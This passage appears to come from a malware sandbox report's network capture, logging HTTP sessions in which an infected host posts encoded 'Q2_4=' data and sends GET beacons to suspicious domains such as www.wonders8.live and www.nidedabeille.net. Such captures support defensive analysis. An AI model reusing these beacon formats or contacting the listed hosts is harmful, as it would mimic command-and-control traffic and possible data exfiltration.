                                                                                                              Data Raw: 51 32 5f 34 3d 35 6b 34 4b 64 72 2b 43 5a 63 37 4e 57 2f 4e 4d 38 69 4a 42 38 59 41 75 55 69 36 45 56 35 70 48 30 6c 54 39 72 77 68 4b 6f 55 71 34 30 6b 2f 68 52 55 53 78 72 4e 50 50 38 6a 4a 37 6c 78 5a 6a 30 4d 70 70 39 66 70 5a 64 46 42 47 68 6e 64 76 76 2f 51 37 77 4f 79 6c 58 57 6d 76 33 72 53 44 38 66 71 66 61 41 50 61 32 73 46 4f 56 52 6b 45 76 6d 30 53 69 52 63 32 6f 6e 4a 76 6b 2f 68 76 53 6c 33 6c 53 2b 66 4b 78 48 74 35 32 37 5a 31 63 6b 45 77 31 69 39 4d 66 6e 43 54 53 47 6c 33 49 71 6c 52 32 62 58 44 4b 36 54 5a 64 69 74 77 6e 59 34 74 6b 70 72 61 61 34 4a 53 54 53 70 4c 55 77 3d 3d
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NW/NM8iJB8YAuUi6EV5pH0lT9rwhKoUq40k/hRUSxrNPP8jJ7lxZj0Mpp9fpZdFBGhndvv/Q7wOylXWmv3rSD8fqfaAPa2sFOVRkEvm0SiRc2onJvk/hvSl3lS+fKxHt527Z1ckEw1i9MfnCTSGl3IqlR2bXDK6TZditwnY4tkpraa4JSTSpLUw==
                                                                                                              Nov 5, 2024 15:38:09.699775934 CET643INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:09 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              63192.168.11.2049804119.18.54.2780
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:12.179430962 CET746OUTPOST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 35 6b 34 4b 64 72 2b 43 5a 63 37 4e 4d 63 6c 4d 39 43 31 42 73 49 41 74 4b 53 36 45 50 4a 70 44 30 6b 76 39 72 78 6c 61 6f 69 36 34 30 46 50 68 41 6c 53 78 71 4e 50 50 6b 7a 4a 2b 72 52 5a 6f 30 4d 6c 68 39 64 74 5a 64 45 6c 47 68 6c 46 76 76 4d 34 38 77 65 79 72 61 32 6d 74 7a 72 53 44 38 66 71 66 61 44 7a 30 32 73 64 4f 56 42 55 45 70 48 30 64 73 78 63 31 69 48 4a 76 7a 76 68 72 53 6c 33 62 53 36 2b 52 78 45 5a 35 32 35 42 31 63 78 6f 7a 75 79 39 4f 56 48 44 41 66 6d 51 64 51 62 74 61 33 59 48 37 50 50 44 37 56 55 38 71 36 71 4d 4a 6e 36 33 6f 65 49 77 36 52 51 6f 51 4a 30 41 30 57 64 45 4a 69 6e 46 63 49 5a 44 33 6e 49 33 7a 66 74 55 3d
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NMclM9C1BsIAtKS6EPJpD0kv9rxlaoi640FPhAlSxqNPPkzJ+rRZo0Mlh9dtZdElGhlFvvM48weyra2mtzrSD8fqfaDz02sdOVBUEpH0dsxc1iHJvzvhrSl3bS6+RxEZ525B1cxozuy9OVHDAfmQdQbta3YH7PPD7VU8q6qMJn63oeIw6RQoQJ0A0WdEJinFcIZD3nI3zftU=
                                                                                                              Nov 5, 2024 15:38:12.661990881 CET643INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:12 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              64192.168.11.2049805119.18.54.2780
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:15.146502972 CET2578OUTPOST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 35 6b 34 4b 64 72 2b 43 5a 63 37 4e 4d 63 6c 4d 39 43 31 42 73 49 41 74 4b 53 36 45 50 4a 70 44 30 6b 76 39 72 78 6c 61 6f 69 79 34 30 58 33 68 52 32 36 78 34 39 50 50 36 6a 4a 2f 72 52 5a 70 30 4d 4e 6c 39 64 68 76 64 48 4e 47 6e 41 5a 76 74 39 34 38 37 65 79 72 46 6d 6d 73 33 72 53 57 38 66 61 62 61 41 62 30 32 73 64 4f 56 44 63 45 71 57 30 64 68 52 63 32 6f 6e 4a 5a 6b 2f 68 44 53 6b 53 6a 53 36 37 6b 32 33 42 35 33 5a 52 31 62 48 63 7a 69 79 39 49 53 48 43 48 66 6d 4d 47 51 62 68 73 33 63 50 52 50 49 66 37 51 44 64 48 6a 34 45 4b 6d 35 33 33 43 34 73 48 52 67 6b 34 41 32 45 30 66 73 73 34 39 51 49 4a 50 49 66 76 2f 37 76 6f 42 72 77 51 43 37 55 6e 71 57 59 59 4b 39 2f 55 7a 78 73 30 4b 70 30 76 39 36 39 33 73 48 59 64 72 68 41 7a 4d 6f 47 2f 74 44 4a 77 79 77 34 53 53 75 70 6f 63 6c 73 37 72 45 64 66 44 6e 4e 4e 74 64 5a 76 39 42 6d 35 37 35 48 50 68 56 44 34 73 72 2f 6e 54 56 62 36 75 56 43 70 55 77 33 45 67 49 50 41 46 4e 6b 44 42 38 4b 59 53 66 44 73 79 51 55 36 76 48 78 74 75 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NMclM9C1BsIAtKS6EPJpD0kv9rxlaoiy40X3hR26x49PP6jJ/rRZp0MNl9dhvdHNGnAZvt9487eyrFmms3rSW8fabaAb02sdOVDcEqW0dhRc2onJZk/hDSkSjS67k23B53ZR1bHcziy9ISHCHfmMGQbhs3cPRPIf7QDdHj4EKm533C4sHRgk4A2E0fss49QIJPIfv/7voBrwQC7UnqWYYK9/Uzxs0Kp0v9693sHYdrhAzMoG/tDJwyw4SSupocls7rEdfDnNNtdZv9Bm575HPhVD4sr/nTVb6uVCpUw3EgIPAFNkDB8KYSfDsyQU6vHxtuj02wQFBsHsHw41+KQyqtJDmkoLJHoytF+prb16vAqZGP6GeOYaXsoTPICiukS71EspXIwq7wbk61tjDJwietHJ/yS5wMylCKQb8QzPgvmKOWtfvOlGRTAgN8oVihlYv0i+j/iwycPunAikd736reL5CfBv46nBoE1uVf6kVJEY34a111gTt4w+NKgNzB6M11fgLF/292J7vND9mtKJoCpRnj+vJp3ZaqSZIAYCndFrVluWEHSFm2946aDO+nIXcvIkUPg/ewAxTqlPPit4QJqlb0OwCctt4G+60C8SVOEiEGrWQdaUY5Zk3fE+2eKK0Ej1cF8sk06cHQLGhl6at/hXi0c6yVNARmAAWkhtKXtWn2EyoPzAnhzcn/ULE4RFVwEacE/YT6dAw5JNW//vs8W1M/zDza9Ns9d2uWFPHX6CAoRZr4VIwPzQzYrdgCBr3nHOCmimUVS5gJ4onJIsoZEgASYbfilS00AxVJ24jHtBdOS8lnI5ClWGr+akczWtV14ruwwfD+weMzPkIDqPyblDKidVXIyAM0VKs06b71VCLXWZ8DxvmMGB/w60ZZeBmcME9Blx4G8NkycAGzCl2flyDsJeOvSVMqK7KpjXiF4b15hy1qzlrww+x6Gx2gpbQfd9rJZkcB/QBK7CizP3ul1P6NIC1NvByaVP [TRUNCATED]
                                                                                                              Nov 5, 2024 15:38:15.146568060 CET5317OUTData Raw: 55 6b 4e 59 6a 4e 33 42 52 6f 72 6d 6c 47 45 4f 41 30 34 71 41 2f 67 4d 6b 75 34 63 70 65 33 5a 76 35 47 4e 64 54 4d 57 32 37 67 6a 39 64 4d 38 45 46 2b 59 2b 61 57 5a 42 34 62 36 53 32 7a 44 6e 45 55 79 47 61 6f 7a 77 48 76 47 47 78 4f 43 62 53
                                                                                                              Data Ascii: UkNYjN3BRormlGEOA04qA/gMku4cpe3Zv5GNdTMW27gj9dM8EF+Y+aWZB4b6S2zDnEUyGaozwHvGGxOCbSd4EYknGHRKJgJ1ZOIJ/YuVed8D3OzKoL3n4X8xr4OVQ0GbGLQMwVP0ZC+TY9uuz5EEuv8WXqqnTjFpRtVhJgP1+YgeQn7fBAcPyiTdshHrefWJpSh86b3sBXG+smwgaLnwDaS6V2Mf9B9wN2J1Mb/aQFGra5/ljd5
                                                                                                              Nov 5, 2024 15:38:15.584599972 CET643INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:15 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              65192.168.11.2049806119.18.54.2780
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:18.127055883 CET457OUTGET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.wonders8.live
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:38:18.595443964 CET844INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:18 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 583
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a [TRUNCATED]
                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              66192.168.11.2049807195.110.124.13380
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:31.995176077 CET735OUTPOST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 69 65 2b 51 36 7a 6c 46 42 68 75 66 49 44 64 4c 68 4f 49 32 78 6e 64 4c 30 5a 36 35 34 6c 4d 55 38 59 34 48 54 38 35 61 66 6a 33 61 66 4d 53 35 34 52 6e 47 68 52 66 68 54 6f 48 39 6f 74 6c 4c 75 56 7a 6e 58 43 49 38 30 71 53 79 44 70 6b 44 30 6f 44 51 4d 30 2f 31 50 74 45 2b 51 56 75 30 70 44 4f 33 33 4e 66 36 6e 30 69 49 71 47 43 54 4e 4f 46 74 41 59 39 72 45 45 79 4a 79 64 41 77 36 56 78 6c 59 31 72 57 62 32 41 50 4a 53 4f 76 36 37 59 4c 42 6f 32 54 63 50 65 53 59 77 33 48 6c 4c 68 36 6b 2f 4b 61 68 39 4c 5a 71 41 52 66 33 46 4e 4a 46 46 43 75 49 56 6e 66 4a 37 4e 77 4b 41 3d 3d
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIDdLhOI2xndL0Z654lMU8Y4HT85afj3afMS54RnGhRfhToH9otlLuVznXCI80qSyDpkD0oDQM0/1PtE+QVu0pDO33Nf6n0iIqGCTNOFtAY9rEEyJydAw6VxlY1rWb2APJSOv67YLBo2TcPeSYw3HlLh6k/Kah9LZqARf3FNJFFCuIVnfJ7NwKA==
                                                                                                              Nov 5, 2024 15:38:32.210288048 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:32 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              67192.168.11.2049808195.110.124.13380
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:34.753774881 CET755OUTPOST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 69 65 2b 51 36 7a 6c 46 42 68 75 66 49 6a 4e 4c 73 4e 67 32 34 6e 64 4b 34 35 36 35 33 46 4d 49 38 59 30 48 54 39 38 58 66 51 54 61 63 75 4b 35 37 54 50 47 6d 52 66 68 59 49 48 43 6e 4e 6c 36 75 56 76 56 58 47 49 38 30 71 57 79 44 6f 34 44 31 65 4c 54 4e 6b 2f 7a 45 4e 45 38 65 31 75 30 70 44 4f 33 33 4a 33 41 6e 30 71 49 74 32 79 54 4f 73 74 73 63 6f 39 71 44 45 79 4a 35 39 42 35 36 56 77 47 59 30 47 7a 62 30 49 50 4a 51 57 76 35 71 59 49 62 34 33 59 54 76 66 75 58 51 79 41 6b 50 56 35 76 75 69 59 35 75 54 38 76 57 41 46 71 33 35 74 47 57 65 63 4d 6c 65 33 4c 35 4d 72 58 43 33 51 6c 55 55 6c 63 4a 5a 4b 37 79 47 7a 66 6c 52 62 68 47 34 3d
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIjNLsNg24ndK45653FMI8Y0HT98XfQTacuK57TPGmRfhYIHCnNl6uVvVXGI80qWyDo4D1eLTNk/zENE8e1u0pDO33J3An0qIt2yTOstsco9qDEyJ59B56VwGY0Gzb0IPJQWv5qYIb43YTvfuXQyAkPV5vuiY5uT8vWAFq35tGWecMle3L5MrXC3QlUUlcJZK7yGzflRbhG4=
                                                                                                              Nov 5, 2024 15:38:34.973217010 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:34 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              68192.168.11.2049809195.110.124.13380
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:37.492533922 CET7904OUTPOST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
